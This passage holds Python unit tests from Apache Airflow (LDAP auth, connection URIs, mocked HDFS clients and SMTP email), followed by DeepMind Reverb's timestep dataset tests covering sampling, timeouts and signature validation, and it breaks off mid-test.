class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
            # the "ldap" section may already exist
            pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
                'modification_time': 1481122343862,
                'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
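        # initdb() creates the default connections (including 'airflow_db')
        # that the tests below rely on.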
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
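        # The last MIME part should be the attachment, with the expected
        # Content-Disposition header and payload.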
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
        # login should not be attempted when no SMTP credentials are configured
        self.assertFalse(mock_smtp.return_value.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
timestep_dataset_test.py
|
# Lint as: python3
# Copyright 2019 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for dataset."""
import threading
import time
from absl.testing import parameterized
import numpy as np
from reverb import client
from reverb import errors
from reverb import item_selectors
from reverb import rate_limiters
from reverb import replay_sample
from reverb import server as reverb_server
from reverb import timestep_dataset
import tensorflow.compat.v1 as tf
import tree
from tensorflow.python.framework import tensor_spec # pylint:disable=g-direct-tensorflow-import
def make_server():
return reverb_server.Server(
tables=[
reverb_server.Table(
'dist',
sampler=item_selectors.Prioritized(priority_exponent=1),
remover=item_selectors.Fifo(),
max_size=1000000,
rate_limiter=rate_limiters.MinSize(1)),
reverb_server.Table(
'signatured',
sampler=item_selectors.Prioritized(priority_exponent=1),
remover=item_selectors.Fifo(),
max_size=1000000,
rate_limiter=rate_limiters.MinSize(1),
signature=tf.TensorSpec(dtype=tf.float32, shape=(None, None))),
reverb_server.Table(
'bounded_spec_signatured',
sampler=item_selectors.Prioritized(priority_exponent=1),
remover=item_selectors.Fifo(),
max_size=1000000,
rate_limiter=rate_limiters.MinSize(1),
              # Currently only the `shape` and `dtype` of the bounded spec
              # are considered during the signature check.
# TODO(b/158033101): Check the boundaries as well.
signature=tensor_spec.BoundedTensorSpec(
dtype=tf.float32,
shape=(None, None),
minimum=(0.0, 0.0),
maximum=(10.0, 10.)),
),
],
port=None,
)
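# The three tables above are identical apart from their names and signatures:
# 'dist' has no signature, while the other two let the tests exercise
# signature validation during sampling.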
class TimestepDatasetTest(tf.test.TestCase, parameterized.TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._server = make_server()
cls._client = client.Client(f'localhost:{cls._server.port}')
def setUp(self):
super().setUp()
self._num_prev_samples = {
table: self._get_total_num_samples(table)
for table in ('dist', 'signatured', 'bounded_spec_signatured')
}
def tearDown(self):
super().tearDown()
self._client.reset('dist')
self._client.reset('signatured')
self._client.reset('bounded_spec_signatured')
@classmethod
def tearDownClass(cls):
super().tearDownClass()
cls._server.stop()
def _populate_replay(self, sequence_length=100, max_time_steps=None):
max_time_steps = max_time_steps or sequence_length
with self._client.writer(max_time_steps) as writer:
for i in range(1000):
writer.append([np.zeros((3, 3), dtype=np.float32)])
if i % 5 == 0 and i >= sequence_length:
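          # Once enough timesteps have been appended, register the last
          # `sequence_length` steps as an item in each table.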
writer.create_item(
table='dist', num_timesteps=sequence_length, priority=1)
writer.create_item(
table='signatured', num_timesteps=sequence_length, priority=1)
writer.create_item(
table='bounded_spec_signatured',
num_timesteps=sequence_length,
priority=1)
def _sample_from(self, dataset, num_samples):
iterator = dataset.make_initializable_iterator()
dataset_item = iterator.get_next()
self.evaluate(iterator.initializer)
return [self.evaluate(dataset_item) for _ in range(num_samples)]
def _get_total_num_samples(self, table: str) -> int:
table_info = self._client.server_info()[table]
return table_info.rate_limiter_info.sample_stats.completed
def _get_num_samples(self, table: str) -> int:
"""Gets the number of samples since the start of the test."""
return self._get_total_num_samples(table) - self._num_prev_samples[table]
@parameterized.named_parameters(
{
'testcase_name': 'default_values',
},
{
'testcase_name': 'num_workers_per_iterator_is_0',
'num_workers_per_iterator': 0,
'want_error': ValueError,
},
{
'testcase_name': 'num_workers_per_iterator_is_1',
'num_workers_per_iterator': 1,
},
{
'testcase_name': 'num_workers_per_iterator_is_minus_1',
'num_workers_per_iterator': -1,
},
{
'testcase_name': 'num_workers_per_iterator_is_minus_2',
'num_workers_per_iterator': -2,
'want_error': ValueError,
},
{
'testcase_name': 'max_samples_per_stream_is_0',
'max_samples_per_stream': 0,
'want_error': ValueError,
},
{
'testcase_name': 'max_samples_per_stream_is_1',
'max_samples_per_stream': 1,
},
{
'testcase_name': 'max_samples_per_stream_is_minus_1',
'max_samples_per_stream': -1,
},
{
'testcase_name': 'max_samples_per_stream_is_minus_2',
'num_workers_per_iterator': -2,
'want_error': ValueError,
},
{
'testcase_name': 'max_in_flight_samples_per_worker_is_0',
'max_in_flight_samples_per_worker': 0,
'want_error': ValueError,
},
{
'testcase_name': 'max_in_flight_samples_per_worker_is_1',
'max_in_flight_samples_per_worker': 1,
},
{
'testcase_name': 'max_in_flight_samples_per_worker_is_minus_1',
'max_in_flight_samples_per_worker': -1,
'want_error': ValueError,
},
)
def test_sampler_parameter_validation(self, **kwargs):
dtypes = (tf.float32,)
shapes = (tf.TensorShape([3, 3]),)
if 'max_in_flight_samples_per_worker' not in kwargs:
kwargs['max_in_flight_samples_per_worker'] = 100
if 'want_error' in kwargs:
error = kwargs.pop('want_error')
with self.assertRaises(error):
timestep_dataset.TimestepDataset(self._client.server_address, 'dist',
dtypes, shapes, **kwargs)
else:
timestep_dataset.TimestepDataset(self._client.server_address, 'dist',
dtypes, shapes, **kwargs)
def test_iterate(self):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
tf.constant(self._client.server_address),
table=tf.constant('dist'),
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
got = self._sample_from(dataset, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
      # A single sample is returned, so the key should be a scalar uint64.
self.assertIsInstance(sample.info.key, np.uint64)
np.testing.assert_array_equal(sample.data[0],
np.zeros((3, 3), dtype=np.float32))
def test_distribution_strategy(self):
self._populate_replay()
physical_devices = tf.config.list_physical_devices('CPU')
configs = tf.config.experimental.get_virtual_device_configuration(
physical_devices[0])
if configs is None:
virtual_devices = [
tf.config.experimental.VirtualDeviceConfiguration() for _ in range(4)
]
tf.config.experimental.set_virtual_device_configuration(
physical_devices[0], virtual_devices)
strategy = tf.distribute.MirroredStrategy(['/cpu:%d' % i for i in range(4)])
def timestep_dataset_fn(i):
tf.print('Creating dataset for replica; index:', i)
return timestep_dataset.TimestepDataset(
self._client.server_address,
table=tf.constant('dist'),
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100).take(2)
def dataset_fn(_):
return tf.data.Dataset.range(4).flat_map(timestep_dataset_fn).take(2 * 4)
ds = strategy.experimental_distribute_datasets_from_function(dataset_fn)
def check_probabilities(_, v):
probability = v.info.probability
self.assertLen(probability.values, 4)
# Don't use any math ops since tensor values seem to contain
# unaligned tensors on some systems; but tf.print doesn't check alignment.
#
# This seems to be caused by a compatibility issue where DistStrat isn't
# well tested when eager mode is disabled. So instead of treating this
# as a true TF bug, we just work around it. We can remove this hack and
# convert it to e.g. tf.assert_greater type check if/when we enable eager
# execution for these tests.
tf.print('Probability values:', probability.values)
def get_next_value(v):
return tf.distribute.get_replica_context().merge_call(
check_probabilities, args=(v,))
@tf.function
def run_strategy(ds_):
i = tf.constant(0)
for v in ds_:
strategy.run(get_next_value, args=(v,))
i += 1
return i
rs = run_strategy(ds)
# Each iteration contains 4 items - one from each replica. We take 8 items
# total, so there should be 2 iterations.
self.assertEqual(2, self.evaluate(rs))
def test_timeout_invalid_arguments(self):
with self.assertRaisesRegex(ValueError, r'must be an integer >= -1'):
timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=-2,
max_in_flight_samples_per_worker=100)
def test_timeout(self):
dataset_0s = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=0,
max_in_flight_samples_per_worker=100)
dataset_1s = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=1000,
max_in_flight_samples_per_worker=100)
dataset_2s = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=2000,
max_in_flight_samples_per_worker=100)
start_time = time.time()
with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError,
r'End of sequence'):
self._sample_from(dataset_0s, 1)
duration = time.time() - start_time
self.assertGreaterEqual(duration, 0)
self.assertLess(duration, 5)
start_time = time.time()
with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError,
r'End of sequence'):
self._sample_from(dataset_1s, 1)
duration = time.time() - start_time
self.assertGreaterEqual(duration, 1)
self.assertLess(duration, 10)
start_time = time.time()
with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError,
r'End of sequence'):
self._sample_from(dataset_2s, 1)
duration = time.time() - start_time
self.assertGreaterEqual(duration, 2)
self.assertLess(duration, 10)
# If we insert some data, and the rate limiter doesn't force any waiting,
# then we can ask for a timeout of 0s and still get data back.
self._populate_replay()
got = self._sample_from(dataset_0s, 2)
self.assertLen(got, 2)
@parameterized.parameters(['signatured'], ['bounded_spec_signatured'])
def test_inconsistent_signature_size(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.float32, tf.float64),
shapes=(tf.TensorShape([3, 3]), tf.TensorShape([])),
max_in_flight_samples_per_worker=100)
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
r'Inconsistent number of tensors requested from table \'{}\'. '
r'Requested 6 tensors, but table signature shows 5 tensors.'.format(
table_name)):
self._sample_from(dataset, 10)
@parameterized.parameters(['signatured'], ['bounded_spec_signatured'])
def test_incompatible_signature_dtype(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.int64,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
r'Requested incompatible tensor at flattened index 4 from table '
r'\'{}\'. Requested \(dtype, shape\): \(int64, \[3,3\]\). '
r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)):
self._sample_from(dataset, 10)
@parameterized.parameters(['signatured'], ['bounded_spec_signatured'])
def test_incompatible_signature_shape(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3]),),
max_in_flight_samples_per_worker=100)
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
r'Requested incompatible tensor at flattened index 4 from table '
r'\'{}\'. Requested \(dtype, shape\): \(float, \[3\]\). '
r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)):
self._sample_from(dataset, 10)
def test_incompatible_dataset_shapes_and_types_without_signature(self):
self._populate_replay()
ds_wrong_shape = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([]),),
max_in_flight_samples_per_worker=100)
with self.assertRaisesRegex(
tf.errors.InvalidArgumentError,
r'Specification has \(dtype, shape\): \(float, \[\]\). '
r'Tensor has \(dtype, shape\): \(float, \[3,3\]\).'):
self._sample_from(ds_wrong_shape, 1)
@parameterized.named_parameters(
dict(testcase_name='TableDist', table_name='dist'),
dict(testcase_name='TableSignatured', table_name='signatured'),
dict(
testcase_name='TableBoundedSpecSignatured',
table_name='bounded_spec_signatured'))
def test_iterate_batched(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(2, True)
got = self._sample_from(dataset, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
# The keys should be batched up like the data.
self.assertEqual(sample.info.key.shape, (2,))
np.testing.assert_array_equal(sample.data[0],
np.zeros((2, 3, 3), dtype=np.float32))
def test_iterate_nested_and_batched(self):
with self._client.writer(100) as writer:
for i in range(1000):
writer.append({
'observation': {
'data': np.zeros((3, 3), dtype=np.float32),
'extras': [
np.int64(10),
np.ones([1], dtype=np.int32),
],
},
'reward': np.zeros((10, 10), dtype=np.float32),
})
if i % 5 == 0 and i >= 100:
writer.create_item(table='dist', num_timesteps=100, priority=1)
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(((tf.float32), (tf.int64, tf.int32)), tf.float32),
shapes=((tf.TensorShape([3, 3]), (tf.TensorShape(None),
tf.TensorShape([1]))),
tf.TensorShape([10, 10])),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(3)
structure = {
'observation': {
'data':
tf.TensorSpec([3, 3], tf.float32),
'extras': [
tf.TensorSpec([], tf.int64),
tf.TensorSpec([1], tf.int32),
],
},
'reward': tf.TensorSpec([], tf.int64),
}
got = self._sample_from(dataset, 10)
self.assertLen(got, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
transition = tree.unflatten_as(structure, tree.flatten(sample.data))
np.testing.assert_array_equal(transition['observation']['data'],
np.zeros([3, 3, 3], dtype=np.float32))
np.testing.assert_array_equal(transition['observation']['extras'][0],
np.ones([3], dtype=np.int64) * 10)
np.testing.assert_array_equal(transition['observation']['extras'][1],
np.ones([3, 1], dtype=np.int32))
np.testing.assert_array_equal(transition['reward'],
np.zeros([3, 10, 10], dtype=np.float32))
def test_multiple_iterators(self):
with self._client.writer(100) as writer:
for i in range(10):
writer.append([np.ones((81, 81), dtype=np.float32) * i])
writer.create_item(table='dist', num_timesteps=10, priority=1)
trajectory_length = 5
batch_size = 3
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([81, 81]),),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(trajectory_length)
iterators = [
dataset.make_initializable_iterator() for _ in range(batch_size)
]
items = tf.stack(
[tf.squeeze(iterator.get_next().data) for iterator in iterators])
with self.session() as session:
session.run([iterator.initializer for iterator in iterators])
got = session.run(items)
self.assertEqual(got.shape, (batch_size, trajectory_length, 81, 81))
want = np.array(
[[np.ones([81, 81]) * i for i in range(trajectory_length)]] *
batch_size)
np.testing.assert_array_equal(got, want)
def test_iterate_over_blobs(self):
for _ in range(10):
self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
